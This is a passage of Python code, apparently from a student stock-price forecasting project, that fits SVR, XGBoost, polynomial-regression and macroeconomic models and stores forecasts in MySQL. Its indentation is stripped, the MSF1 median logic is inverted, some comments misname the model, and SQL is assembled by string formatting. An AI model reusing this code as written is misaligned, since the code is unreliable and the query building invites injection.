# or add new dates based on information in Statistics table
if latest_date.empty or latest_date['ForecastDate'][0] <= data['Date'][n]:
# historical next-day random forest forecast
x_train = [i for i in range(input_length-1)]
y_train = data['Close'][n - (input_length - 1):n]
x_test = [input_length-1]
x_train = np.array(x_train)
y_train = np.array(y_train)
x_test = np.array(x_test)
x_train = x_train.reshape(-1, 1)
x_test = x_test.reshape(-1, 1)
clf_svr = SVR(kernel='rbf', C=1e3, gamma=0.1)
clf_svr.fit(x_train, y_train)
forecastClose = clf_svr.predict(x_test)[0]
predError = 100 * abs(forecastClose-data['Close'][n])/data['Close'][n]
forecastDate = "'" + str(data['Date'][n]) + "'"
insert_query = insert_query.format(forecastDate, ID, forecastClose, algoCode, predError)
self.engine.execute(insert_query)
# training and test data set sizes
forecast_length = 10
forecast_input = 50
# Train Random Forest model for future price movements
x_train = [i for i in range(forecast_input)]
y_train = data['Close'][-forecast_input:]
x_test = [i for i in range(forecast_length)]
x_train = np.array(x_train)
y_train = np.array(y_train)
x_test = np.array(x_test)
x_train = x_train.reshape(-1, 1)
x_test = x_test.reshape(-1, 1)
clf_svr = SVR(kernel='rbf', C=1e3, gamma=0.1)
clf_svr.fit(x_train, y_train)
forecast = clf_svr.predict(x_test)
forecast_dates_query = 'SELECT date from dbo_datedim WHERE date > {} AND weekend=0 AND isholiday=0 ' \
'ORDER BY date ASC LIMIT {}'.format(forecastDate, forecast_length)
future_dates = pd.read_sql_query(forecast_dates_query, self.engine)
# insert prediction into database
for n in range(0, forecast_length):
insert_query = 'INSERT INTO dbo_algorithmforecast VALUES ({}, {}, {}, {}, {})'
forecastClose = forecast[n]
predError = 0
forecastDate = "'" + str(future_dates['date'][n]) + "'"
insert_query = insert_query.format(forecastDate, ID, forecastClose, algoCode, predError)
self.engine.execute(insert_query)
def calculate_xgboost_forecast(self):
"""
Calculate historic next-day returns based on XGBoost
and 10 days of future price forecast
Store results in dbo_AlgorithmForecast
Each prediction is made using the prior 50 days close prices
"""
# retrieve InstrumentsMaster table from database
query = 'SELECT * FROM {}'.format(self.table_name)
df = pd.read_sql_query(query, self.engine)
algoCode = "'xgb'"
# add code to database if it doesn't exist
code_query = 'SELECT COUNT(*) FROM dbo_algorithmmaster WHERE algorithmcode=%s' % algoCode
count = pd.read_sql_query(code_query, self.engine)
if count.iat[0, 0] == 0:
algoName = "'xgb'"
insert_code_query = 'INSERT INTO dbo_algorithmmaster VALUES({},{})'.format(algoCode, algoName)
self.engine.execute(insert_code_query)
# loop through each ticker symbol
for ID in df['instrumentid']:
# remove all future prediction dates - these need to be recalculated daily
remove_future_query = 'DELETE FROM dbo_AlgorithmForecast WHERE AlgorithmCode={} AND PredError=0 AND ' \
'InstrumentID={}'.format(algoCode, ID)
self.engine.execute(remove_future_query)
# find the latest forecast date
date_query = 'SELECT ForecastDate FROM dbo_AlgorithmForecast WHERE AlgorithmCode={} AND InstrumentID={} ' \
'ORDER BY ForecastDate DESC LIMIT 1'.format(algoCode, ID)
latest_date = pd.read_sql_query(date_query, self.engine) # most recent forecast date calculation
# if table has forecast prices already find the latest one and delete it
# need to use most recent data for today if before market close at 4pm
if not latest_date.empty:
latest_date_str = "'" + str(latest_date['ForecastDate'][0]) + "'"
delete_query = 'DELETE FROM dbo_AlgorithmForecast WHERE AlgorithmCode={} AND InstrumentID={} AND ' \
'ForecastDate={}'.format(algoCode, ID, latest_date_str)
self.engine.execute(delete_query)
# get raw price data from database
data_query = 'SELECT Date, Close FROM dbo_InstrumentStatistics WHERE InstrumentID=%s ORDER BY Date ASC' % ID
data = pd.read_sql_query(data_query, self.engine)
# training data size
# IF THIS CHANGES ALL RELATED PREDICTIONS STORED IN THE DATABASE BECOME INVALID!
input_length = 10
for n in range((input_length - 1), len(data)):
insert_query = 'INSERT INTO dbo_AlgorithmForecast VALUES ({}, {}, {}, {}, {})'
# populate entire table if empty
# or add new dates based on information in Statistics table
if latest_date.empty or latest_date['ForecastDate'][0] <= data['Date'][n]:
# historical next-day random forest forecast
x_train = [i for i in range(input_length-1)]
y_train = data['Close'][n - (input_length - 1):n]
x_test = [input_length-1]
x_train = np.array(x_train)
y_train = np.array(y_train)
x_test = np.array(x_test)
x_train = x_train.reshape(-1, 1)
x_test = x_test.reshape(-1, 1)
#XG BOOST Regressor with tree depth, subsample ratio of tree growth...etc.
xg_reg = xgb.XGBRegressor(max_depth=3, learning_rate=0.30, n_estimators=15,
objective="reg:linear", subsample=0.5,
colsample_bytree=0.8, seed=10)
xg_reg.fit(x_train, y_train)
forecastClose = xg_reg.predict(x_test)[0]
predError = 100 * abs(forecastClose-data['Close'][n])/data['Close'][n]
forecastDate = "'" + str(data['Date'][n]) + "'"
insert_query = insert_query.format(forecastDate, ID, forecastClose, algoCode, predError)
self.engine.execute(insert_query)
# training and test data set sizes
forecast_length = 10
forecast_input = 50
# find XG BOOST model for future price movements
x_train = [i for i in range(forecast_input)]
y_train = data['Close'][-forecast_input:]
x_test = [i for i in range(forecast_length)]
x_train = np.array(x_train)
y_train = np.array(y_train)
x_test = np.array(x_test)
x_train = x_train.reshape(-1, 1)
x_test = x_test.reshape(-1, 1)
#XGBoost Regressor Predictions added 11/16/19
xg_reg = xgb.XGBRegressor(max_depth=3, learning_rate=0.30, n_estimators=15,
objective="reg:linear", subsample=0.5,
colsample_bytree=0.8, seed=10)
xg_reg.fit(x_train, y_train)
forecast = xg_reg.predict(x_test)
forecast_dates_query = 'SELECT date from dbo_datedim WHERE date > {} AND weekend=0 AND isholiday=0 ' \
'ORDER BY date ASC LIMIT {}'.format(forecastDate, forecast_length)
future_dates = pd.read_sql_query(forecast_dates_query, self.engine)
# insert prediction into MySQL database
# predError will be 0, there are no close prices available for future dates
for n in range(0, forecast_length):
insert_query = 'INSERT INTO dbo_algorithmforecast VALUES ({}, {}, {}, {}, {})'
forecastClose = forecast[n]
predError = 0
forecastDate = "'" + str(future_dates['date'][n]) + "'"
insert_query = insert_query.format(forecastDate, ID, forecastClose, algoCode, predError)
self.engine.execute(insert_query)
def calculate_regression(self):
"""
Calculate polynomial regression of the next 10 days
Algorithm's accuracy is... questionable
"""
# retrieve InstrumentsMaster table from database
query = 'SELECT * FROM {}'.format(self.table_name)
df = pd.read_sql_query(query, self.engine)
algoCode = "'regression'"
# add code to database if it doesn't exist
code_query = 'SELECT COUNT(*) FROM dbo_algorithmmaster WHERE algorithmcode=%s' % algoCode
count = pd.read_sql_query(code_query, self.engine)
if count.iat[0, 0] == 0:
algoName = "'PolynomialRegression'"
insert_code_query = 'INSERT INTO dbo_algorithmmaster VALUES({},{})'.format(algoCode, algoName)
self.engine.execute(insert_code_query)
# loop through each ticker symbol
for ID in df['instrumentid']:
# remove all future prediction dates
remove_future_query = 'DELETE FROM dbo_algorithmforecast WHERE algorithmcode={} AND prederror=0 AND ' \
'instrumentid={}'.format(algoCode, ID)
self.engine.execute(remove_future_query)
# find the latest forecast date
date_query = 'SELECT forecastdate FROM dbo_algorithmforecast WHERE algorithmcode={} AND instrumentid={} ' \
'ORDER BY forecastdate DESC LIMIT 1'.format(algoCode, ID)
latest_date = pd.read_sql_query(date_query, self.engine) # most recent forecast date calculation
# if table has forecast prices already find the latest one and delete it
# need to use most recent data for today if before market close at 4pm
if not latest_date.empty:
latest_date_str = "'" + str(latest_date['forecastdate'][0]) + "'"
delete_query = 'DELETE FROM dbo_algorithmforecast WHERE algorithmcode={} AND instrumentid={} AND ' \
'forecastdate={}'.format(algoCode, ID, latest_date_str)
self.engine.execute(delete_query)
# get raw price data from database
data_query = 'SELECT date, close FROM dbo_instrumentstatistics WHERE instrumentid=%s ORDER BY Date ASC' % ID
data = pd.read_sql_query(data_query, self.engine)
# regression model from previous days
input_length = 20
# predict ahead
forecast_length = 5
for n in range(input_length, len(data)):
recent_data = data[n - input_length:n]
# get most recent trading day
forecastDate = "'" + str(data['date'][n]) + "'"
# x and y axis
x_axis = np.array(recent_data['date'])
y_axis = np.array(recent_data['close'])
# convert date to a ordinal value to allow for regression
df = pd.DataFrame({'date': x_axis, 'close': y_axis})
df['date'] = pd.to_datetime(df['date'])
df['date'] = df['date'].map(dt.datetime.toordinal)
X = np.array(df['date'])
X = np.array(X)
X = X.reshape(-1, 1)
y = np.array(df['close'])
poly_reg = PolynomialFeatures(degree=4)
X_poly = poly_reg.fit_transform(X)
pol_reg = LinearRegression()
pol_reg.fit(X_poly, y)
# plt.scatter(X, y, color='red')
# plt.plot(X, pol_reg.predict(poly_reg.fit_transform(X)), color='blue')
# plt.title('Prediction')
# plt.xlabel('Date')
# plt.ylabel('Percentage Change')
# plt.show()
forecast_dates_query = 'SELECT date from dbo_datedim WHERE date > {} AND weekend=0 AND isholiday=0 ' \
'ORDER BY date ASC LIMIT {}'.format(forecastDate, forecast_length)
future_dates = pd.read_sql_query(forecast_dates_query, self.engine)
# delete outdated forecasts for the next period
delete_query = 'DELETE FROM dbo_algorithmforecast WHERE algorithmcode={} AND instrumentid={} AND ' \
'forecastdate>{}'.format(algoCode, ID, forecastDate)
self.engine.execute(delete_query)
for n in range(len(future_dates)):
insert_query = 'INSERT INTO dbo_algorithmforecast VALUES ({}, {}, {}, {}, {})'
forecastDate = future_dates['date'][n]
ordinalDate = forecastDate.toordinal()
forecastDate = "'" + str(future_dates['date'][n]) + "'"
forecastClose = pol_reg.predict(poly_reg.fit_transform([[ordinalDate]]))
forecastClose = (round(forecastClose[0], 3))
# populate entire table if empty
# or add new dates based on information in Statistics table
insert_query = insert_query.format(forecastDate, ID, forecastClose, algoCode, 0)
self.engine.execute(insert_query)
def MSF1(self):
#Queires the database to grab all of the Macro Economic Variable codes
query = "SELECT macroeconcode FROM dbo_macroeconmaster WHERE activecode = 'A'"
id = pd.read_sql_query(query, self.engine)
id = id.reset_index(drop=True)
#Queries the database to grab all of the instrument IDs
query = 'SELECT instrumentid FROM dbo_instrumentmaster'
id2 = pd.read_sql_query(query, self.engine)
id2 = id2.reset_index(drop = True)
# Sets value for number of datapoints you would like to work with
n = 9
# Getting Dates for Future Forecast#
#Initialize the currentDate variable for use when grabbing the forecasted dates
currentDate = datetime.today()
# Creates a list to store future forecast dates
date = []
# This will set the value of count according to which month we are in, this is to avoid having past forecast dates in the list
if (currentDate.month < 4):
count = 0
elif (currentDate.month < 7 and currentDate.month >= 4):
count = 1
elif (currentDate.month < 10 and currentDate.month >= 7):
count = 2
else:
count = 3
# Initialize a variable to the current year
year = currentDate.year
#Prints out the accuracy figures, not necessary can be commented out
FinsterTab.W2020.AccuracyTest.MSF1_accuracy(self.engine)
# Setup a for loop to loop through and append the date list with the date of the start of the next quarter
# For loop will run n times, corresponding to amount of data points we are working with
for i in range(n):
# If the count is 0 then we are still in the first quarter
if (count == 0):
# Append the date list with corresponding quarter and year
date.append(str(year) + "-03-" + "31")
# Increase count so this date is not repeated for this year
count += 1
#Do it again for the next quarter
elif (count == 1):
date.append(str(year) + "-06-" + "30")
count += 1
#And again for the next quarter
elif (count == 2):
date.append(str(year) + "-09-" + "30")
count += 1
# Until we account for the last quarter of the year
else:
date.append(str(year) + "-12-" + "31")
count = 0
# Where we then incrament the year for the next iterations
year = year + 1
#Initializes a list for which we will eventually be storing all data to add to the macroeconalgorithm database table
data = []
#Create a for loop to iterate through all of the instrument ids
for v in id2['instrumentid']:
#Median_forecast will be a dictionary where the key is the date and the value is a list of forecasted prices
median_forecast = {}
#This will be used to easily combine all of the forecasts for different dates to determine the median forecast value
for i in date:
temp = {i: []}
median_forecast.update(temp)
# Initiailizes a variable to represent today's date, used to fetch forecast dates
currentDate = str(datetime.today())
# Applies quotes to current date so it can be read as a string
currentDate = ("'" + currentDate + "'")
#This query will grab quarterly instrument prices from between 2014 and the current date to be used in the forecasting
query = "SELECT close, instrumentid FROM ( SELECT date, close, instrumentID, ROW_NUMBER() OVER " \
"(PARTITION BY YEAR(date), MONTH(date) ORDER BY DAY(date) DESC) AS rowNum FROM " \
"dbo_instrumentstatistics WHERE instrumentid = {} AND date BETWEEN '2014-03-21' AND {} ) z " \
"WHERE rowNum = 1 AND ( MONTH(z.date) = 3 OR MONTH(z.date) = 6 OR MONTH(z.date) = 9 OR " \
"MONTH(z.date) = 12)".format(v, currentDate)
# Executes the query and stores the result in a dataframe variable
df2 = pd.read_sql_query(query, self.engine)
#This for loop iterates through the different macro economic codes to calculate the percent change for each macroeconomic variable
for x in id['macroeconcode']:
#Retrieves Relevant Data from Database
query = 'SELECT * FROM dbo_macroeconstatistics WHERE macroeconcode = {}'.format('"' + str(x) + '"')
df = pd.read_sql_query(query, self.engine)
macro = df.tail(n)
SP = df2.tail(n)
temp = df.tail(n+1)
temp = temp.reset_index()
#Converts macro variables to precent change
macroPercentChange = macro
macro = macro.reset_index(drop=True)
SP = SP.reset_index(drop=True)
macroPercentChange = macroPercentChange.reset_index(drop=True)
for i in range(0, n):
if (i == 0):
macrov = (macro['statistics'][i]-temp['statistics'][i])/temp['statistics'][i]
macroPercentChange['statistics'].iloc[i] = macrov * 100
else:
macrov = (macro['statistics'][i]-macro['statistics'][i - 1])/macro['statistics'][i - 1]
macroPercentChange['statistics'].iloc[i] = macrov * 100
#Algorithm for forecast price
S = DataForecast.calc(self, macroPercentChange, SP, n) #Calculates the average GDP and S&P values for the given data points over n days and performs operations on GDP average
# temp_price will be used to hold the previous forecast price for the next prediction
temp_price = 0
# isFirst will determine whether or not this is the first calculation being done
# If it is true then we use the most recent instrument statistic to forecast the first pricepoint
# IF it is false then we use the previous forecast price to predict the next forecast price
isFirst = True
# Setup a for loop to calculate the final forecast price and add data to the list variable data
for i in range(n):
if isFirst:
if x in [2, 3, 4]:
temp_price = ((S*SP['close'].iloc[n-1]) + SP['close'].iloc[n-1])
isFirst = False
else:
temp_price = ((S*SP['close'].iloc[n-1]) + SP['close'].iloc[n-1])
isFirst = False
else:
if x in [2, 3, 4]:
temp_price = ((S*temp_price) + temp_price)
else:
temp_price = ((S*temp_price)+ temp_price)
#Once the forecast price is calculated append it to median_forecast list
median_forecast[date[i]].append(temp_price)
#Calculates the median value for each date using a list of prices forecasted by each individual macro economic variable
forecast_prices = []
for i in date:
#Sort the forecasted prices based on date
sorted_prices = sorted(median_forecast[i])
#calculate the median forecasted price for each date
if len(sorted_prices) % 2 == 0:
center = int(len(sorted_prices)/2)
forecast_prices.append(sorted_prices[center])
else:
center = int(len(sorted_prices)/2)
forecast_prices.append((sorted_prices[center] + sorted_prices[center - 1])/2)
#Set up a for loop to construct a list using variables associated with macroeconalgorithm database table
for i in range(len(forecast_prices)):
data.append([date[i], v, 'ALL', forecast_prices[i], 'MSF1', 0])
# Convert data list to dataframe variable
table = pd.DataFrame(data, columns=['forecastdate','instrumentid' , 'macroeconcode',
'forecastprice', 'algorithmcode', 'prederror'])
#Fill the database with the relevant information
table.to_sql('dbo_macroeconalgorithmforecast', self.engine, if_exists=('replace'),
index=False)
def MSF2(self):
# If you want to use set weightings, set this true. Otherwise set it false
# If you set it to true then the weightings can be altered for MSF2 in AccuracyTest.py on line 647 in create_weightings_MSF2
# Using set weightings will significantly speed up the run time of the application
setWeightings = True
# Query to grab the macroeconcodes and macroeconnames from the macroeconmaster database table
query = "SELECT macroeconcode, macroeconname FROM dbo_macroeconmaster WHERE activecode = 'A'"
data = pd.read_sql_query(query, self.engine)
# Query to grab the instrumentid and instrument name from the instrumentmaster database table
query = 'SELECT instrumentid, instrumentname FROM dbo_instrumentmaster'
data1 = pd.read_sql_query(query, self.engine)
# Keys is a dictionary that will be used to store the macro econ code for each macro econ name
keys = {}
for i in range(len(data)):
keys.update({data['macroeconname'].iloc[i]: data['macroeconcode'].iloc[i]})
# ikeys is a dictionary that will be used to store instrument ids for each instrument name
ikeys = {}
for x in range(len(data1)):
ikeys.update({data1['instrumentname'].iloc[x]: data1['instrumentid'].iloc[x]})
# Vars is a dictionary used to store the macro economic variable percent change for each macro economic code
vars = {}
for i in data['macroeconname']:
# Vars is only populated with the relevant macro economic variables (GDP, UR, IR, and MI)
if(i == 'GDP' or i == 'Unemployment Rate' or i == 'Inflation Rate' or i == 'Misery Index'):
d = {i: []}
vars.update(d)
# Result will hold the resulting forecast prices for each instrument ID
result = {}
for i in data1['instrumentid']:
d = {i: []}
result.update(d)
# Weightings are determined through a function written in accuracytest.py
# The weightings returned are used in the calculation below
weightings = FinsterTab.W2020.AccuracyTest.create_weightings_MSF2(self.engine, setWeightings)
n = 8
# Getting Dates for Future Forecast #
# --------------------------------------------------------------------------------------------------------------#
# Initialize the currentDate variable for use when grabbing the forecasted dates
currentDate = datetime.today()
# Creates a list to store future forecast dates
date = []
# This will set the value of count according to which month we are in, this is to avoid having past forecast dates in the list
if (currentDate.month < 4):
count = 0
elif (currentDate.month < 7 and currentDate.month >= 4):
count = 1
elif (currentDate.month < 10 and currentDate.month >= 7):
count = 2
else:
count = 3
# Initialize a variable to the current year
year = currentDate.year
# Setup a for loop to loop through and append the date list with the date of the start of the next quarter
# For loop will run n times, corresponding to amount of data points we are working with
for i in range(n):
# If the count is 0 then we are still in the first quarter
if (count == 0):
# Append the date list with corresponding quarter and year
date.append(str(year) + "-03-" + "31")
# Increase count so this date is not repeated for this year
count += 1
# Do the same for the next quarter
elif (count == 1):
date.append(str(year) + "-06-" + "30")
count += 1
# And for the next quarter
elif (count == 2):
date.append(str(year) + "-09-" + "30")
count += 1
# Until we account for the last quarter of the year
else:
date.append(str(year) + "-12-" + "31")
# Where we then reinitialize count to 0
count = 0
# And then incrament the year for the next iterations
year = year + 1
# --------------------------------------------------------------------------------------------------------------#
# reinitializes currentDate to todays date, also typecasts it to a string so it can be read by MySQL
currentDate = str(datetime.today())
currentDate = ("'" + currentDate + "'")
# For loop to loop through the macroeconomic codes to calculate the macro economic variable percent change
for i in keys:
# Check to make sure the macroeconcode we are working with is one of the relevant ones
if i in vars:
# Query to grab the macroeconomic statistics from the database using the relevant macro economic codes
query = 'SELECT date, statistics, macroeconcode FROM dbo_macroeconstatistics WHERE macroeconcode = {}'.format('"' + keys[i] + '"')
data = pd.read_sql_query(query, self.engine)
# For loop to retrieve macro statistics and calculate percent change
for j in range(n):
# This will grab the n+1 statistic to use to calculate the percent change to the n statistic
temp = data.tail(n + 1)
# This will grab the most recent n statistics from the query, as we are working only with n points
data = data.tail(n)
# For the first iteration we need to use the n+1th statistic to calculate percent change on the oldest point
if j == 0:
macrov = (data['statistics'].iloc[j] - temp['statistics'].iloc[0]) / temp['statistics'].iloc[0]
vars[i].append(macrov)
else:
macrov = (data['statistics'].iloc[j] - data['statistics'].iloc[j - 1]) / \
data['statistics'].iloc[j - 1]
vars[i].append(macrov)
# We now iterate through the instrument ids
for x in ikeys:
# This query will grab the quarterly instrument statistics from 2014 to now
query = "SELECT date, close, instrumentid FROM ( SELECT date, close, instrumentid, ROW_NUMBER() OVER " \
"(PARTITION BY YEAR(date), MONTH(date) ORDER BY DAY(date) DESC) AS rowNum FROM " \
"dbo_instrumentstatistics WHERE instrumentid = {} AND date BETWEEN '2014-03-21' AND {} ) z " \
"WHERE rowNum = 1 AND ( MONTH(z.date) = 3 OR MONTH(z.date) = 6 OR MONTH(z.date) = 9 OR " \
"MONTH(z.date) = 12)".format(ikeys[x], currentDate)
# Then we execute the query and store the returned values in instrumentStats, and grab the last n stats from the dataframe as we are only using n datapoints
instrumentStats = pd.read_sql_query(query, self.engine)
instrumentStats = instrumentStats.tail(n)
# Temp result will then store the resulting forecast prices throughout the calculation of n datapoints
temp_result = []
# isFirst will determine whether or not this is the first calculation being done
# If it is true then we use the most recent instrument statistic to forecast the first pricepoint
# IF it is false then we use the previous forecast price to predict the next forecast price
isFirst = True
# This for loop is where the actual calculation takes place
for i in range(n):
if isFirst:
stat = vars['GDP'][i] * weightings[ikeys[x]][0] - (vars['Unemployment Rate'][i] * weightings[ikeys[x]][1] + vars['Inflation Rate'][i] * weightings[ikeys[x]][2]) - (vars['Misery Index'][i] * vars['Misery Index'][i])
stat = (stat * instrumentStats['close'].iloc[n-1]) + instrumentStats['close'].iloc[n-1]
temp_result.append(stat)
temp_price = stat
isFirst = False
else:
stat = vars['GDP'][i] * weightings[ikeys[x]][0] - (vars['Unemployment Rate'][i] * weightings[ikeys[x]][1] + vars['Inflation Rate'][i] *
weightings[ikeys[x]][2]) - (vars['Misery Index'][i] * vars['Misery Index'][i])
stat = (stat * temp_price) + temp_price
temp_result.append(stat)
temp_price = stat
# We then append the resulting forcasted prices over n quarters to result, a dictionary where each
# Instrument ID is mapped to n forecast prices
result[ikeys[x]].append(temp_result)
#Table will represent a temporary table with the data appended matching the columns of the macroeconalgorithmforecast database table
table = []
#This forloop will populate table[] with the correct values according to the database structure
for i, k in result.items():
cnt = 0
for j in k:
for l in range(n):
table.append([date[cnt], i, 'ALL', j[cnt], 'MSF2', 0])
cnt += 1
#Once table is populated we then push it into the macroeconalgorithmforecast table
table = pd.DataFrame(table, columns=['forecastdate','instrumentid' , 'macroeconcode',
'forecastprice', 'algorithmcode', 'prederror'])
table.to_sql('dbo_macroeconalgorithmforecast', self.engine, if_exists=('append'), index=False)
def MSF3(self):
# If you want to use set weightings, set this true. Otherwise set it false
# If you set it to true then the weightings can be altered for MSF3 in AccuracyTest.py on line 1064 in create_weightings_MSF3
# Using set weightings will significantly speed up the run time of the application
setWeightings = True
# Query to grab the macroeconcodes and macroeconnames from the macroeconmaster database table
query = "SELECT macroeconcode, macroeconname FROM dbo_macroeconmaster WHERE activecode = 'A'"
data = pd.read_sql_query(query, self.engine)
# Query to grab the instrumentid and instrument name from the instrumentmaster database table
query = 'SELECT instrumentid, instrumentname FROM dbo_instrumentmaster'
data1 = pd.read_sql_query(query, self.engine)
# Keys is a dictionary that will be used to store the macro econ code for each macro econ name
keys = {}
for i in range(len(data)):
keys.update({data['macroeconname'].iloc[i]: data['macroeconcode'].iloc[i]})
# ikeys is a dictionary that will be used to store instrument ids for each instrument name
ikeys = {}
for x in range(len(data1)):
ikeys.update({data1['instrumentname'].iloc[x]: data1['instrumentid'].iloc[x]})
# Vars is a dictionary used to store the macro economic variable percent change for each macro economic code
vars = {}
for i in data['macroeconcode']:
# Vars is only populated with the relevant macro economic variables (GDP, COVI, CPIUC, and FSI)
if(i == 'GDP' or i == 'COVI' or i == 'CPIUC' or i == 'FSI'):
d = {i: []}
vars.update(d)
# Result will hold the resulting forecast prices for each instrument ID
result = {}
for i in data1['instrumentid']:
d = {i: []}
result.update(d)
# Weightings are determined through a function written in accuracytest.py
# The weightings returned are used in the calculation below
weightings = FinsterTab.W2020.AccuracyTest.create_weightings_MSF3(self.engine, setWeightings)
n = 8
# Getting Dates for Future Forecast #
# --------------------------------------------------------------------------------------------------------------#
# Initialize the currentDate variable for use when grabbing the forecasted dates
currentDate = datetime.today()
# Creates a list to store future forecast dates
date = []
# This will set the value of count according to which month we are in, this is to avoid having past forecast dates in the list
if (currentDate.month < 4):
count = 0
elif (currentDate.month < 7 and currentDate.month >= 4):
count = 1
elif (currentDate.month < 10 and currentDate.month >= 7):
count = 2
else:
count = 3
# Initialize a variable to the current year
year = currentDate.year
# Setup a for loop to loop through and append the date list with the date of the start of the next quarter
# For loop will run n times, corresponding to amount of data points we are working with
for i in range(n):
# If the count is 0 then we are still in the first quarter
if (count == 0):
# Append the date list with corresponding quarter and year
date.append(str(year) + "-03-" + "31")
# Increase count so this date is not repeated for this year
count += 1
# Do the same for the next quarter
elif (count == 1):
date.append(str(year) + "-06-" + "30")
count += 1
# And for the next quarter
elif (count == 2):
date.append(str(year) + "-09-" + "30")
count += 1
# Until we account for the last quarter of the year
else:
date.append(str(year) + "-12-" + "31")
# Where we then reinitialize count to 0
count = 0
# And then incrament the year for the next iterations
year = year + 1
# --------------------------------------------------------------------------------------------------------------#
# reinitializes currentDate to todays date, also typecasts it to a string so it can be read by MySQL
currentDate = str(datetime.today())
currentDate = ("'" + currentDate + "'")
# For loop to loop through the macroeconomic codes to calculate the macro economic variable percent change
for i in keys:
# Check to make sure the macroeconcode we are working with is one of the relevant ones
if keys[i] in vars:
# Query to grab the macroeconomic statistics from the database using the relevant macro economic codes
query = 'SELECT date, statistics, macroeconcode FROM dbo_macroeconstatistics WHERE macroeconcode = {}'.format(
'"' + keys[i] + '"')
data = pd.read_sql_query(query, self.engine)
# For loop to retrieve macro statistics and calculate percent change
for j in range(n):
# This will grab the n+1 statistic to use to calculate the percent change to the n statistic
temp = data.tail(n + 1)
# This will grab the most recent n statistics from the query, as we are working only with n points
data = data.tail(n)
# For the first iteration we need to use the n+1th statistic to calculate percent change on the oldest point
if j == 0:
macrov = (data['statistics'].iloc[j] - temp['statistics'].iloc[0]) / temp['statistics'].iloc[0]
vars[keys[i]].append(macrov)
else:
macrov = (data['statistics'].iloc[j] - data['statistics'].iloc[j - 1]) / \
data['statistics'].iloc[j - 1]
vars[keys[i]].append(macrov)
# We now iterate through the instrument ids
for x in ikeys:
# This query will grab the quarterly instrument statistics from 2014 to now
query = "SELECT date, close, instrumentid FROM ( SELECT date, close, instrumentid, ROW_NUMBER() OVER " \
"(PARTITION BY YEAR(date), MONTH(date) ORDER BY DAY(date) DESC) AS rowNum FROM " \
"dbo_instrumentstatistics WHERE instrumentid = {} AND date BETWEEN '2014-03-21' AND {} ) z " \
"WHERE rowNum = 1 AND ( MONTH(z.date) = 3 OR MONTH(z.date) = 6 OR MONTH(z.date) = 9 OR " \
"MONTH(z.date) = 12)".format(ikeys[x], currentDate)
# Then we execute the query and store the returned values in instrumentStats, and grab the last n stats from the dataframe as we are only using n datapoints
instrumentStats = pd.read_sql_query(query, self.engine)
instrumentStats = instrumentStats.tail(n)
# Temp result will then store the resulting forecast prices throughout the calculation of n datapoints
temp_result = []
# isFirst will determine whether or not this is the first calculation being done
# If it is true then we use the most recent instrument statistic to forecast the first pricepoint
# IF it is false then we use the previous forecast price to predict the next forecast price
isFirst = True
# This for loop is where the actual calculation takes place
for i in range(n):
if isFirst:
stat = vars['GDP'][i] * weightings[ikeys[x]][0] - (vars['COVI'][i] * weightings[ikeys[x]][1] + vars['FSI'][i] * weightings[ikeys[x]][2]) - \
(vars['CPIUC'][i] * vars['CPIUC'][i])
stat = (stat * instrumentStats['close'].iloc[n-1]) + instrumentStats['close'].iloc[n-1]
temp_result.append(stat)
temp_price = stat
isFirst = False
else:
stat = vars['GDP'][i] * weightings[ikeys[x]][0] - (vars['COVI'][i] * weightings[ikeys[x]][1] + vars['FSI'][i] * weightings[ikeys[x]][2]) - \
(vars['CPIUC'][i] * vars['CPIUC'][i])
stat = (stat * temp_price) + temp_price
temp_result.append(stat)
temp_price = stat
# We then append the resulting forcasted prices over n quarters to result, a dictionary where each
# Instrument ID is mapped to n forecast prices
result[ikeys[x]].append(temp_result)
# Table will represent a temporary table with the data appended matching the columns of the macroeconalgorithmforecast database table
table = []
# This forloop will populate table[] with the correct values according to the database structure
for i, k in result.items():
cnt = 0
for j in k:
for l in range(n):
table.append([date[cnt], i, 'ALL', j[cnt], 'MSF3', 0])
cnt += 1
# Once table is populated we then push it into the macroeconalgorithmforecast table
table = pd.DataFrame(table, columns=['forecastdate','instrumentid' , 'macroeconcode',
'forecastprice', 'algorithmcode', 'prederror'])
table.to_sql('dbo_macroeconalgorithmforecast', self.engine, if_exists=('append'), index=False)
def MSF2_Past_Date(self):
# Query to grab the macroeconcodes and macroeconnames from the macroeconmaster database table
query = "SELECT macroeconcode, macroeconname FROM dbo_macroeconmaster WHERE activecode = 'A'"
data = pd.read_sql_query(query, self.engine)
# Query to grab the instrumentid and instrument name from the instrumentmaster database table
query = 'SELECT instrumentid, instrumentname FROM dbo_instrumentmaster WHERE instrumentid = 3'
data1 = pd.read_sql_query(query, self.engine)
# Keys is a dictionary that will be used to store the macro econ code for each macro econ name
keys = {}
for i in range(len(data)):
keys.update({data['macroeconname'].iloc[i]: data['macroeconcode'].iloc[i]})
# ikeys is a dictionary that will be used to store instrument ids for each instrument name
ikeys = {}
for x in range(len(data1)):
ikeys.update({data1['instrumentname'].iloc[x]: data1['instrumentid'].iloc[x]})
# Vars is a dictionary used to store the macro economic variable percent change for each macro economic code
vars = {}
for i in data['macroeconname']:
# Vars is only populated with the relevant macro economic variables (GDP, UR, IR, and MI)
if(i == 'GDP' or i == 'Unemployment Rate' or i == 'Inflation Rate' or i == 'Misery Index'):
d = {i: []}
vars.update(d)
# Result will hold the resulting forecast prices for each instrument ID
result = {}
for i in data1['instrumentid']:
d = {i: []}
result.update(d)
# Weightings are determined through a function written in accuracytest.py
# The weightings returned are used in the calculation below
weightings = FinsterTab.W2020.AccuracyTest.create_weightings_MSF2_Past_Dates(self.engine)
n = 8
# Getting Dates for Future Forecast #
# --------------------------------------------------------------------------------------------------------------#
# Initialize the currentDate variable for use when grabbing the forecasted dates
currentDate = datetime.today()
# Creates a list to store future forecast dates
date = []
# This will set the value of count according to which month we are in, this is to avoid having past forecast dates in the list
if (currentDate.month < 4):
count = 0
elif (currentDate.month < 7 and currentDate.month >= 4):
count = 1
elif (currentDate.month < 10 and currentDate.month >= 7):
count = 2
else:
count = 3
# Initialize a variable to the current year
year = currentDate.year
# Setup a for loop to loop through and append the date list with the date of the start of the next quarter
# For loop will run n times, corresponding to amount of data points we are working with
for i in range(n):
# If the count is 0 then we are still in the first quarter
if (count == 0):
# Append the date list with corresponding quarter and year
date.append(str(year) + "-03-" + "31")
# Increase count so this date is not repeated for this year
count += 1
# Do the same for the next quarter
elif (count == 1):
date.append(str(year) + "-06-" + "30")
count += 1
# And for the next quarter
elif (count == 2):
date.append(str(year) + "-09-" + "30")
count += 1
# Until we account for the last quarter of the year
else:
date.append(str(year) + "-12-" + "31")
# Where we then reinitialize count to 0
count = 0
# And then incrament the year for the next iterations
year = year + 1
# --------------------------------------------------------------------------------------------------------------#
